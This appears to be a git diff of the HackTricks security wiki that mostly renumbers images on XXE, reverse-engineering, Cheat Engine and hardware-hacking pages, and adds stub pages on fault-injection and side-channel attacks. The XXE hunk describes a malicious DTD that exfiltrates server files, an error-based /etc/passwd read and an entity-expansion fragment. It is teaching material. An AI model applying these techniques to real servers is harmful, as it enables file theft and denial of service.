-**In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (**for **multi-line files you could try to ex-filtrate it via** _**ftp://**_ using this basic server for example [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). This explanation is based in** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.**
+**In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (for multi-line files you could try to ex-filtrate it via \_ftp://**\_ using this basic server for example [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). This explanation is based in** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.**
 
 In the given malicious DTD, a series of steps are conducted to exfiltrate data:
 
@@ -178,7 +178,7 @@ The malicious external DTD can be invoked with the following XML:
 
 Upon execution, the web server's response should include an error message displaying the contents of the `/etc/passwd` file.
 
-![](<../.gitbook/assets/image (806).png>)
+![](<../.gitbook/assets/image (809).png>)
 
 _**Please notice that external DTD allows us to include one entity inside the second (****`eval`****), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_
 
@@ -226,7 +226,7 @@ The outlined steps are executed by this DTD:
 <stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
 ```
 
-![](<../.gitbook/assets/image (622).png>)
+![](<../.gitbook/assets/image (625).png>)
 
 As this technique uses an **internal DTD you need to find a valid one first**. You could do this **installing** the same **OS / Software** the server is using and **searching some default DTDs**, or **grabbing a list** of **default DTDs** inside systems and **check** if any of them exists:
 
@@ -344,7 +344,7 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 
 #### Quadratic Blowup Attack
 
-![](<../.gitbook/assets/image (524).png>)
+![](<../.gitbook/assets/image (527).png>)
 
 #### Getting NTML
 
@@ -790,10 +790,10 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
 * [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\\
 * [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
 
-
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md
index 5123ec1f9..dee5d85c7 100644
--- a/reversing/reversing-tools-basic-methods/README.md
+++ b/reversing/reversing-tools-basic-methods/README.md
@@ -81,7 +81,7 @@ In order to debug code using DNSpy you need to:
 
 First, change the **Assembly attributes** related to **debugging**:
 
-![](<../../.gitbook/assets/image (970).png>)
+![](<../../.gitbook/assets/image (973).png>)
 
 From:
 
@@ -104,7 +104,7 @@ And click on **compile**:
 
 Then save the new file via _**File >> Save module...**_:
 
-![](<../../.gitbook/assets/image (599).png>)
+![](<../../.gitbook/assets/image (602).png>)
 
 This is necessary because if you don't do this, at **runtime** several **optimisations** will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**.
 
@@ -116,25 +116,25 @@ iisreset /noforce
 
 Then, in order to start debugging you should close all the opened files and inside the **Debug Tab** select **Attach to Process...**:
 
-![](<../../.gitbook/assets/image (315).png>)
+![](<../../.gitbook/assets/image (318).png>)
 
 Then select **w3wp.exe** to attach to the **IIS server** and click **attach**:
 
-![](<../../.gitbook/assets/image (110).png>)
+![](<../../.gitbook/assets/image (113).png>)
 
 Now that we are debugging the process, it's time to stop it and load all the modules. First click on _Debug >> Break All_ and then click on _**Debug >> Windows >> Modules**_:
 
-![](<../../.gitbook/assets/image (129).png>)
+![](<../../.gitbook/assets/image (132).png>)
 
-![](<../../.gitbook/assets/image (831).png>)
+![](<../../.gitbook/assets/image (834).png>)
 
 Click any module on **Modules** and select **Open All Modules**:
 
-![](<../../.gitbook/assets/image (919).png>)
+![](<../../.gitbook/assets/image (922).png>)
 
 Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
 
-![](<../../.gitbook/assets/image (336).png>)
+![](<../../.gitbook/assets/image (339).png>)
 
 ## Java decompiler
 
@@ -149,11 +149,11 @@ Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
 * Select **Windbg** debugger
 * Select "**Suspend on library load/unload**"
 
-![](<../../.gitbook/assets/image (865).png>)
+![](<../../.gitbook/assets/image (868).png>)
 
 * Configure the **parameters** of the execution putting the **path to the DLL** and the function that you want to call:
 
-![](<../../.gitbook/assets/image (701).png>)
+![](<../../.gitbook/assets/image (704).png>)
 
 Then, when you start debugging **the execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped.
 
@@ -168,7 +168,7 @@ But, how can you get to the code of the DLL that was lodaded? Using this method,
 
 Notice that when the execution is stopped by any reason in win64dbg you can see **in which code you are** looking in the **top of the win64dbg window**:
 
-![](<../../.gitbook/assets/image (839).png>)
+![](<../../.gitbook/assets/image (842).png>)
 
 Then, looking to this ca see when the execution was stopped in the dll you want to debug.
 
@@ -182,7 +182,7 @@ Then, looking to this ca see when the execution was stopped in the dll you want
 
 [**PiNCE**](https://github.com/korcankaraokcu/PINCE) is a front-end/reverse engineering tool for the GNU Project Debugger (GDB), focused on games. However, it can be used for any reverse-engineering related stuff
 
-[**Decompiler Explorer**](https://dogbolt.org/) is a web front-end to a number of decompilers. This web service lets you compare the output of different decompilers on small executables. 
+[**Decompiler Explorer**](https://dogbolt.org/) is a web front-end to a number of decompilers. This web service lets you compare the output of different decompilers on small executables.
 
 ## ARM & MIPS
 
@@ -206,7 +206,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
 
 [**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
 
-![](<../../.gitbook/assets/image (506).png>)
+![](<../../.gitbook/assets/image (509).png>)
 
 You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/).
 
@@ -216,17 +216,17 @@ You can download a compiled version of [jmp2it inside the releases page](https:/
 
 Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't:
 
-![](<../../.gitbook/assets/image (559).png>)
+![](<../../.gitbook/assets/image (562).png>)
 
 In order to start the emulation in the place you want to, set a bp there and apparently cutter will automatically start the emulation from there:
 
-![](<../../.gitbook/assets/image (586).png>)
+![](<../../.gitbook/assets/image (589).png>)
 
-![](<../../.gitbook/assets/image (384).png>)
+![](<../../.gitbook/assets/image (387).png>)
 
 You can see the stack for example inside a hex dump:
 
-![](<../../.gitbook/assets/image (183).png>)
+![](<../../.gitbook/assets/image (186).png>)
 
 ### Deobfuscating shellcode and getting executed functions
 
@@ -244,7 +244,7 @@ scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset
 
 scDbg also counts with a graphical launcher where you can select the options you want and execute the shellcode
 
-![](<../../.gitbook/assets/image (255).png>)
+![](<../../.gitbook/assets/image (258).png>)
 
 The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg).
 
@@ -274,7 +274,7 @@ If you are playing a **CTF, this workaround to find the flag** could be very use
 
 To find the **entry point** search the functions by `::main` like in:
 
-![](<../../.gitbook/assets/image (1077).png>)
+![](<../../.gitbook/assets/image (1080).png>)
 
 In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\
 Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
@@ -318,7 +318,7 @@ If you get the **binary** of a GBA game you can use different tools to **emulate
 
 In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_\*\* \*\* you can see how to press the Game Boy Advance **buttons**
 
-![](<../../.gitbook/assets/image (578).png>)
+![](<../../.gitbook/assets/image (581).png>)
 
 When pressed, each **key has a value** to identify it:
 
@@ -337,7 +337,7 @@ L = 256
 
 So, in this kind of program, the interesting part will be **how the program treats the user input**. In the address **0x4000130** you will find the commonly found function: **KEYINPUT**.
 
-![](<../../.gitbook/assets/image (444).png>)
+![](<../../.gitbook/assets/image (447).png>)
 
 In the previous image you can find that the function is called from **FUN\_080015a8** (addresses: _0x080015fa_ and _0x080017ac_).
 
diff --git a/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/reversing/reversing-tools-basic-methods/angr/angr-examples.md
index 77d4b3482..66eecbcd4 100644
--- a/reversing/reversing-tools-basic-methods/angr/angr-examples.md
+++ b/reversing/reversing-tools-basic-methods/angr/angr-examples.md
@@ -222,7 +222,7 @@ if __name__ == '__main__':
 
 In this scenario, the input was taken with `scanf("%u %u")` and the value `"1 1"` was given, so the values **`0x00000001`** of the stack come from the **user input**. You can see how this values starts in `$ebp - 8`. Therefore, in the code we have **subtracted 8 bytes to `$esp` (as in that moment `$ebp` and `$esp` had the same value)** and then we have pushed the BVS.
 
-![](<../../../.gitbook/assets/image (133).png>)
+![](<../../../.gitbook/assets/image (136).png>)
 
 ### Static Memory values (Global variables)
 
diff --git a/reversing/reversing-tools-basic-methods/cheat-engine.md b/reversing/reversing-tools-basic-methods/cheat-engine.md
index af90e78a3..9b23d4b94 100644
--- a/reversing/reversing-tools-basic-methods/cheat-engine.md
+++ b/reversing/reversing-tools-basic-methods/cheat-engine.md
@@ -19,36 +19,36 @@ When you download and run it, you are **presented** with a **tutorial** of how t
 
 ## What are you searching?
 
-![](<../../.gitbook/assets/image (759).png>)
+![](<../../.gitbook/assets/image (762).png>)
 
 This tool is very useful to find **where some value** (usually a number) **is stored in the memory** of a program.\
 **Usually numbers** are stored in **4bytes** form, but you could also find them in **double** or **float** formats, or you may want to look for something **different from a number**. For that reason you need to be sure you **select** what you want to **search for**:
 
-![](<../../.gitbook/assets/image (321).png>)
+![](<../../.gitbook/assets/image (324).png>)
 
 Also you can indicate **different** types of **searches**:
 
-![](<../../.gitbook/assets/image (307).png>)
+![](<../../.gitbook/assets/image (311).png>)
 
 You can also check the box to **stop the game while scanning the memory**:
 
-![](<../../.gitbook/assets/image (1049).png>)
+![](<../../.gitbook/assets/image (1052).png>)
 
 ### Hotkeys
 
 In _**Edit --> Settings --> Hotkeys**_ you can set different **hotkeys** for different purposes like **stopping** the **game** (which is quiet useful if at some point you want to scan the memory). Other options are available:
 
-![](<../../.gitbook/assets/image (861).png>)
+![](<../../.gitbook/assets/image (864).png>)
 
 ## Modifying the value
 
 Once you **found** where is the **value** you are **looking for** (more about this in the following steps) you can **modify it** double clicking it, then double clicking its value:
 
-![](<../../.gitbook/assets/image (560).png>)
+![](<../../.gitbook/assets/image (563).png>)
 
 And finally **marking the check** to get the modification done in the memory:
 
-![](<../../.gitbook/assets/image (382).png>)
+![](<../../.gitbook/assets/image (385).png>)
 
 The **change** to the **memory** will be immediately **applied** (note that until the game doesn't use this value again the value **won't be updated in the game**).
 
@@ -60,11 +60,11 @@ So, we are going to suppose that there is an important value (like the life of y
 
 Supposing you are looking for the value 100, you **perform a scan** searching for that value and you find a lot of coincidences:
 
-![](<../../.gitbook/assets/image (105).png>)
+![](<../../.gitbook/assets/image (108).png>)
 
 Then, you do something so that **value changes**, and you **stop** the game and **perform** a **next scan**:
 
-![](<../../.gitbook/assets/image (681).png>)
+![](<../../.gitbook/assets/image (684).png>)
 
 Cheat Engine will search for the **values** that **went from 100 to the new value**. Congrats, you **found** the **address** of the value you were looking for, you can now modify it.\
 _If you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
@@ -75,21 +75,21 @@ In the scenario you **don't know the value** but you know **how to make it chang
 
 So, start by performing a scan of type "**Unknown initial value**":
 
-![](<../../.gitbook/assets/image (887).png>)
+![](<../../.gitbook/assets/image (890).png>)
 
 Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) and perform a **next scan**:
 
-![](<../../.gitbook/assets/image (368).png>)
+![](<../../.gitbook/assets/image (371).png>)
 
 You will be presented **all the values that were modified in the selected way**:
 
-![](<../../.gitbook/assets/image (566).png>)
+![](<../../.gitbook/assets/image (569).png>)
 
 Once you have found your value, you can modify it.
 
 Note that there are a **lot of possible changes** and you can do these **steps as much as you want** to filter the results:
 
-![](<../../.gitbook/assets/image (571).png>)
+![](<../../.gitbook/assets/image (574).png>)
 
 ### Random Memory Address - Finding the code
 
@@ -97,18 +97,18 @@ Until know we learnt how to find an address storing a value, but it's highly pro
 
 Using some of the mentioned tricks, find the address where your current game is storing the important value. Then (stopping the game if you whish) do a **right click** on the found **address** and select "**Find out what accesses this address**" or "**Find out what writes to this address**":
 
-![](<../../.gitbook/assets/image (1064).png>)
+![](<../../.gitbook/assets/image (1067).png>)
 
 The **first option** is useful to know which **parts** of the **code** are **using** this **address** (which is useful for more things like **knowing where you can modify the code** of the game).\
 The **second option** is more **specific**, and will be more helpful in this case as we are interested in knowing **from where this value is being written**.
 
 Once you have selected one of those options, the **debugger** will be **attached** to the program and a new **empty window** will appear. Now, **play** the **game** and **modify** that **value** (without restarting the game). The **window** should be **filled** with the **addresses** that are **modifying** the **value**:
 
-![](<../../.gitbook/assets/image (88).png>)
+![](<../../.gitbook/assets/image (91).png>)
 
 Now that you found the address it's modifying the value you can **modify the code at your pleasure** (Cheat Engine allows you to modify it for NOPs real quick):
 
-![](<../../.gitbook/assets/image (1054).png>)
+![](<../../.gitbook/assets/image (1057).png>)
 
 So, you can now modify it so the code won't affect your number, or will always affect in a positive way.
 
@@ -116,28 +116,28 @@ So, you can now modify it so the code won't affect your number, or will always a
 
 Following the previous steps, find where the value you are interested is. Then, using "**Find out what writes to this address**" find out which address writes this value and double click on it to get the disassembly view:
 
-![](<../../.gitbook/assets/image (1036).png>)
+![](<../../.gitbook/assets/image (1039).png>)
 
 Then, perform a new scan **searching for the hex value between "\[]"** (the value of $edx in this case):
 
-![](<../../.gitbook/assets/image (991).png>)
+![](<../../.gitbook/assets/image (994).png>)
 
 (_If several appear you usually need the smallest address one_)\
 Now, we have f**ound the pointer that will be modifying the value we are interested in**.
 
 Click on "**Add Address Manually**":
 
-![](<../../.gitbook/assets/image (987).png>)
+![](<../../.gitbook/assets/image (990).png>)
 
 Now, click on the "Pointer" check box and add the found address in the text box (in this scenario, the found address in the previous image was "Tutorial-i386.exe"+2426B0):
 
-![](<../../.gitbook/assets/image (388).png>)
+![](<../../.gitbook/assets/image (392).png>)
 
 (Note how the first "Address" is automatically populated from the pointer address you introduce)
 
 Click OK and a new pointer will be created:
 
-![](<../../.gitbook/assets/image (305).png>)
+![](<../../.gitbook/assets/image (308).png>)
 
 Now, every time you modifies that value you are **modifying the important value even if the memory address where the value is is different.**
 
@@ -147,24 +147,24 @@ Code injection is a technique where you inject a piece of code into the target p
 
 So, imagine you have found the address that is subtracting 1 to the life of your player:
 
-![](<../../.gitbook/assets/image (200).png>)
+![](<../../.gitbook/assets/image (203).png>)
 
 Click on Show disassembler to get the **disassemble code**.\
 Then, click **CTRL+a** to invoke the Auto assemble window and select _**Template --> Code Injection**_
 
-![](<../../.gitbook/assets/image (899).png>)
+![](<../../.gitbook/assets/image (902).png>)
 
 Fill the **address of the instruction you want to modify** (this is usually autofilled):
 
-![](<../../.gitbook/assets/image (741).png>)
+![](<../../.gitbook/assets/image (744).png>)
 
 A template will be generated:
 
-![](<../../.gitbook/assets/image (941).png>)
+![](<../../.gitbook/assets/image (944).png>)
 
 So, insert your new assembly code in the "**newmem**" section and remove the original code from the "**originalcode**" if you don't want it to be executed\*\*.\*\* In this example the injected code will add 2 points instead of substracting 1:
 
-![](<../../.gitbook/assets/image (518).png>)
+![](<../../.gitbook/assets/image (521).png>)
 
 **Click on execute and so on and your code should be injected in the program changing the behaviour of the functionality!**
 
diff --git a/reversing/word-macros.md b/reversing/word-macros.md
index f35ea5077..83022975f 100644
--- a/reversing/word-macros.md
+++ b/reversing/word-macros.md
@@ -19,13 +19,13 @@ Other ways to support HackTricks:
 It's very common to find **junk code that is never used** to make the reversing of the macro more difficult.\
 For example, in the following image you can see that and If that is never going to be true is used to execute some junk and useless code.
 
-![](<../.gitbook/assets/image (365).png>)
+![](<../.gitbook/assets/image (369).png>)
 
 ### Macro Forms
 
 Using the **GetObject** function it's possible to obtain data from forms of the macro. This can be used to difficult the analysis. The following is a photo of a macro form used to **hide data inside text boxes** (a text box can be hiding other text boxes):
 
-![](<../.gitbook/assets/image (341).png>)
+![](<../.gitbook/assets/image (344).png>)
 
 <details>
 
diff --git a/todo/hardware-hacking/fault_injection_attacks.md b/todo/hardware-hacking/fault_injection_attacks.md
new file mode 100644
index 000000000..ad6fa7a35
--- /dev/null
+++ b/todo/hardware-hacking/fault_injection_attacks.md
@@ -0,0 +1,5 @@
+# Fault Injection Attacks 
+
+Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits.
+
+There are a lot of methods and mediums for injecting fault into an electronic circuit. 
diff --git a/todo/hardware-hacking/i2c.md b/todo/hardware-hacking/i2c.md
index 852a2ba0d..c488de4fb 100644
--- a/todo/hardware-hacking/i2c.md
+++ b/todo/hardware-hacking/i2c.md
@@ -61,11 +61,11 @@ As you can see in the previous command line it said that it found 0 errors. This
 
 To connect with the bus pirate you can follow the docs:
 
-![](<../../.gitbook/assets/image (481).png>)
+![](<../../.gitbook/assets/image (484).png>)
 
 In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
 
-![](<../../.gitbook/assets/image (961).png>)
+![](<../../.gitbook/assets/image (964).png>)
 
 To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
 In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
@@ -173,7 +173,7 @@ NACK
 
 In this scenario we are going to sniff the I2C communication between the arduino and the previous EPROM, you just need to communicate both devices and then connect the bus pirate to the SCL, SDA and GND pins:
 
-![](<../../.gitbook/assets/image (163).png>)
+![](<../../.gitbook/assets/image (166).png>)
 
 ```bash
 I2C>m
diff --git a/todo/hardware-hacking/jtag.md b/todo/hardware-hacking/jtag.md
index d7d27e87f..efaa180af 100644
--- a/todo/hardware-hacking/jtag.md
+++ b/todo/hardware-hacking/jtag.md
@@ -24,14 +24,14 @@ In the **Raspberry PI** you can only use **pins from 1 to 6** (6pins, so you wil
 
 In Arduino, after connecting the cables (pin 2 to 11 to JTAG pins and Arduino GND to the baseboard GND), **load the JTAGenum program in Arduino** and in the Serial Monitor send a **`h`** (command for help) and you should see the help:
 
-![](<../../.gitbook/assets/image (936).png>)
+![](<../../.gitbook/assets/image (939).png>)
 
-![](<../../.gitbook/assets/image (575).png>)
+![](<../../.gitbook/assets/image (578).png>)
 
 Configure **"No line ending" and 115200baud**.\
 Send the command s to start scanning:
 
-![](<../../.gitbook/assets/image (771).png>)
+![](<../../.gitbook/assets/image (774).png>)
 
 If you are contacting a JTAG, you will find one or several **lines starting by FOUND!** indicating the pins of JTAG.
 
diff --git a/todo/hardware-hacking/radio.md b/todo/hardware-hacking/radio.md
index ad16f1c06..2b91f3db9 100644
--- a/todo/hardware-hacking/radio.md
+++ b/todo/hardware-hacking/radio.md
@@ -23,11 +23,11 @@ Other ways to support HackTricks:
 After installing there are a few things that you could consider configuring.\
 In settings (the second tab button) you can select the **SDR device** or **select a file** to read and which frequency to syntonise and the Sample rate (recommended to up to 2.56Msps if your PC support it)\\
 
-![](<../../.gitbook/assets/image (242).png>)
+![](<../../.gitbook/assets/image (245).png>)
 
 In the GUI behaviour it's recommended to enable a few things if your PC support it:
 
-![](<../../.gitbook/assets/image (469).png>)
+![](<../../.gitbook/assets/image (472).png>)
 
 {% hint style="info" %}
 If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
@@ -37,26 +37,26 @@ If you realise that your PC is not capturing things try to disable OpenGL and lo
 
 * Just to **capture some time of a signal and analyze it** just maintain the button "Push to capture" as long as you need.
 
-![](<../../.gitbook/assets/image (957).png>)
+![](<../../.gitbook/assets/image (960).png>)
 
 * The **Tuner** of SigDigger helps to **capture better signals** (but it can also degrade them). Ideally start with 0 and keep **making it bigger until** you find the **noise** introduce is **bigger** than the **improvement of the signal** you need).
 
-![](<../../.gitbook/assets/image (1096).png>)
+![](<../../.gitbook/assets/image (1099).png>)
 
 ### Synchronize with radio channel
 
 With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with the channel you want to hear, configure "Baseband audio preview" option, configure the bandwith to get all the info being sent and then set the Tuner to the level before the noise is really starting to increase:
 
-![](<../../.gitbook/assets/image (582).png>)
+![](<../../.gitbook/assets/image (585).png>)
 
 ## Interesting tricks
 
 * When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
 * In frames of information you usually should **find different frames well aligned between them**:
 
-![](<../../.gitbook/assets/image (1073).png>)
+![](<../../.gitbook/assets/image (1076).png>)
 
-![](<../../.gitbook/assets/image (594).png>)
+![](<../../.gitbook/assets/image (597).png>)
 
 * **After recovering the bits you might need to process them someway**. For example, in Manchester codification a up+down will be a 1 or 0 and a down+up will be the other one. So pairs of 1s and 0s (ups and downs) will be a real 1 or a real 0.
 * Even if a signal is using Manchester codification (it's impossible to find more than two 0s or 1s in a row), you might **find several 1s or 0s together in the preamble**!
@@ -66,7 +66,7 @@ With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with t
 There are 3 ways to store information in signals: Modulating the **amplitude**, **frequency** or **phase**.\
 If you are checking a signal there are different ways to try to figure out what is being used to store information (fin more ways below) but a good one is to check the IQ graph.
 
-![](<../../.gitbook/assets/image (785).png>)
+![](<../../.gitbook/assets/image (788).png>)
 
 * **Detecting AM**: If in the IQ graph appears for example **2 circles** (probably one in 0 and other in a different amplitude), it could means that this is an AM signal. This is because in the IQ graph the distance between the 0 and the circle is the amplitude of the signal, so it's easy to visualize different amplitudes being used.
 * **Detecting PM**: Like in the previous image, if you find small circles not related between them it probably means that a phase modulation is used. This is because in the IQ graph, the angle between the point and the 0,0 is the phase of the signal, so that means that 4 different phases are used.
@@ -85,21 +85,21 @@ If you are checking a signal there are different ways to try to figure out what
 
 Checking AM info with [**SigDigger** ](https://github.com/BatchDrake/SigDigger)and just looking at the **envelop** you can see different clear amplitude levels. The used signal is sending pulses with information in AM, this is how one pulse looks like:
 
-![](<../../.gitbook/assets/image (587).png>)
+![](<../../.gitbook/assets/image (590).png>)
 
 And this is how part of the symbol looks like with the waveform:
 
-![](<../../.gitbook/assets/image (731).png>)
+![](<../../.gitbook/assets/image (734).png>)
 
 #### Checking the Histogram
 
 You can **select the whole signal** where information is located, select **Amplitude** mode and **Selection** and click on **Histogram.** You can observer that 2 clear levels are only found
 
-![](<../../.gitbook/assets/image (261).png>)
+![](<../../.gitbook/assets/image (264).png>)
 
 For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
 
-![](<../../.gitbook/assets/image (729).png>)
+![](<../../.gitbook/assets/image (732).png>)
 
 If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
 
@@ -107,7 +107,7 @@ If you find a lot of frequencies potentially this won't be a FM, probably the si
 
 In this example you can see how there is a **big circle** but also **a lot of points in the centre.**
 
-![](<../../.gitbook/assets/image (219).png>)
+![](<../../.gitbook/assets/image (222).png>)
 
 ### Get Symbol Rate
 
@@ -115,19 +115,19 @@ In this example you can see how there is a **big circle** but also **a lot of po
 
 Select the smallest symbol you can find (so you are sure it's just 1) and check the "Selection freq". I this case it would be 1.013kHz (so 1kHz).
 
-![](<../../.gitbook/assets/image (75).png>)
+![](<../../.gitbook/assets/image (78).png>)
 
 #### With a group of symbols
 
 You can also indicate the number of symbols you are going to select and SigDigger will calculate the frequency of 1 symbol (the more symbols selected the better probably). In this scenario I selected 10 symbols and the "Selection freq" is 1.004 Khz:
 
-![](<../../.gitbook/assets/image (1005).png>)
+![](<../../.gitbook/assets/image (1008).png>)
 
 ### Get Bits
 
 Having found this is an **AM modulated** signal and the **symbol rate** (and knowing that in this case something up means 1 and something down means 0), it's very easy to **obtain the bits** encoded in the signal. So, select the signal with info and configure the sampling and decision and press sample (check that **Amplitude** is selected, the discovered **Symbol rate** is configured and the **Gadner clock recovery** is selected):
 
-![](<../../.gitbook/assets/image (962).png>)
+![](<../../.gitbook/assets/image (965).png>)
 
 * **Sync to selection intervals** means that if you previously selected intervals to find the symbol rate, that symbol rate will be used.
 * **Manual** means that the indicated symbol rate is going to be used
@@ -136,17 +136,17 @@ Having found this is an **AM modulated** signal and the **symbol rate** (and kno
 
 Pressing sample this appears:
 
-![](<../../.gitbook/assets/image (641).png>)
+![](<../../.gitbook/assets/image (644).png>)
 
 Now, to make SigDigger understand **where is the range** of the level carrying information you need to click on the **lower level** and maintain clicked until the biggest level:
 
-![](<../../.gitbook/assets/image (436).png>)
+![](<../../.gitbook/assets/image (439).png>)
 
 If there would have been for example **4 different levels of amplitude**, you should have need to configure the **Bits per symbol to 2** and select from the smallest to the biggest.
 
 Finally **increasing** the **Zoom** and **changing the Row size** you can see the bits (and you can select all and copy to get all the bits):
 
-![](<../../.gitbook/assets/image (273).png>)
+![](<../../.gitbook/assets/image (276).png>)
 
 If the signal has more than 1 bit per symbol (for example 2), SigDigger has **no way to know which symbol is** 00, 01, 10, 11, so it will use different **grey scales** the represent each (and if you copy the bits it will use **numbers from 0 to 3**, you will need to treat them).
 
@@ -162,35 +162,35 @@ Also, use **codifications** such as **Manchester**, and **up+down** can be **1 o
 
 Signal example sending information modulated in FM:
 
-![](<../../.gitbook/assets/image (722).png>)
+![](<../../.gitbook/assets/image (725).png>)
 
 In the previous image you can observe pretty good that **2 frequencies are used** but if you **observe** the **waveform** you might n**ot be able to identify correctly the 2 different frequencies**:
 
-![](<../../.gitbook/assets/image (714).png>)
+![](<../../.gitbook/assets/image (717).png>)
 
 This is because I capture the signal in booth frequencies, therefore one is approximately the other in negative:
 
-![](<../../.gitbook/assets/image (939).png>)
+![](<../../.gitbook/assets/image (942).png>)
 
 If the synchronized frequency is **closer to one frequency than to the other** you can easily see the 2 different frequencies:
 
-![](<../../.gitbook/assets/image (419).png>)
+![](<../../.gitbook/assets/image (422).png>)
 
-![](<../../.gitbook/assets/image (485).png>)
+![](<../../.gitbook/assets/image (488).png>)
 
 #### Checking the histogram
 
 Checking the frequency histogram of the signal with information you can easily see 2 different signals:
 
-![](<../../.gitbook/assets/image (868).png>)
+![](<../../.gitbook/assets/image (871).png>)
 
 In this case if you check the **Amplitude histogram** you will find **only one amplitude**, so it **cannot be AM** (if you find a lot of amplitudes it might be because the signal has been losing power along the channel):
 
-![](<../../.gitbook/assets/image (814).png>)
+![](<../../.gitbook/assets/image (817).png>)
 
 And this is would be phase histogram (which makes very clear the signal is not modulated in phase):
 
-![](<../../.gitbook/assets/image (993).png>)
+![](<../../.gitbook/assets/image (996).png>)
 
 #### With IQ
 
@@ -198,7 +198,7 @@ IQ doesn't have a field to identify frequencies (distance to centre is amplitude
 Therefore, to identify FM, you should **only see basically a circle** in this graph.\
 Moreover, a different frequency is "represented" by the IQ graph by a **speed acceleration across the circle** (so in SysDigger selecting the signal the IQ graph is populated, if you find an acceleration or change of direction in the created circle it could mean that this is FM):
 
-![](<../../.gitbook/assets/image (78).png>)
+![](<../../.gitbook/assets/image (81).png>)
 
 ### Get Symbol Rate
 
diff --git a/todo/hardware-hacking/side_channel_analysis.md b/todo/hardware-hacking/side_channel_analysis.md
new file mode 100644
index 000000000..2ad4b6e8f
--- /dev/null
+++ b/todo/hardware-hacking/side_channel_analysis.md
@@ -0,0 +1,7 @@
+# Side Channel Analysis Attacks 
+
+Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example: 
+
+Analysing the vibrations in glass sheets which is near the sound source, but the sound source is not accessible. The vibrations in glass are influenced by the sound source and if monitored and analysed, the sound can be decoded and interpreted.
+
+These attacks are very popular in case of leaking data such as private keys or finding operations in the processors. An electronic circuit is has a lot of channels from which, information is constantly leaked. Monitoring and analysing can be useful for diclosing a lot of information about the circuit and internals of it. 
diff --git a/todo/hardware-hacking/spi.md b/todo/hardware-hacking/spi.md
index fd939f982..69c059435 100644
--- a/todo/hardware-hacking/spi.md
+++ b/todo/hardware-hacking/spi.md
@@ -24,47 +24,47 @@ The MOSI (Master Out, Slave In) and MISO (Master In, Slave Out) are responsible
 
 ## Dumping Firmware from EEPROMs
 
-Dumping firmware can be useful for analysing the firmware and finding vulnerabilities in them. Often times, the firmware is not available on the internet or is irrelevant due to variations of factors like model number, version, etc. Hence, extracting the firmware directly from the physical device can be helpful to be specific while hunting for threats. 
+Dumping firmware can be useful for analysing the firmware and finding vulnerabilities in them. Often times, the firmware is not available on the internet or is irrelevant due to variations of factors like model number, version, etc. Hence, extracting the firmware directly from the physical device can be helpful to be specific while hunting for threats.
 
